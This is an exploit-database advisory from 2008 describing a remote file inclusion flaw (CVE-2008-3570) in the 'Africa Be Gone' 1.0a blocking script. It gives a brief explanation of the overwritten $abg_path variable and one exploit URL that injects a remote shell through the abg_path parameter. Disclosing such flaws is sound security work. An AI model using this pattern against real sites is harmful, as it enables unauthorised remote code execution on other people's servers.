ABG Blocking Script 1.0a - 'abg_path' Remote File Inclusion



EKU-ID: 14105 CVE: OSVDB-47381;CVE-2008-3570 OSVDB-ID:
Author: Lo$er Published: 2008-08-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


=================================================================
========Africa Be Gone version 1.0a Remote File Inclusion========
=================================================================

Vendor: http://www.africabegone.com
Download: http://www.africabegone.com/includes/downloads/index.php?file=1&sort=1
Discovered: 7-31-08
Discovered By: Lo$er

====Vulnerable code====

$abg_path is initilizied but overwritten later down the road.

====RFI====

http://www.[site].com/[abg path]/index.php?abg_path=[shell]?

# milw0rm.com [2008-08-01]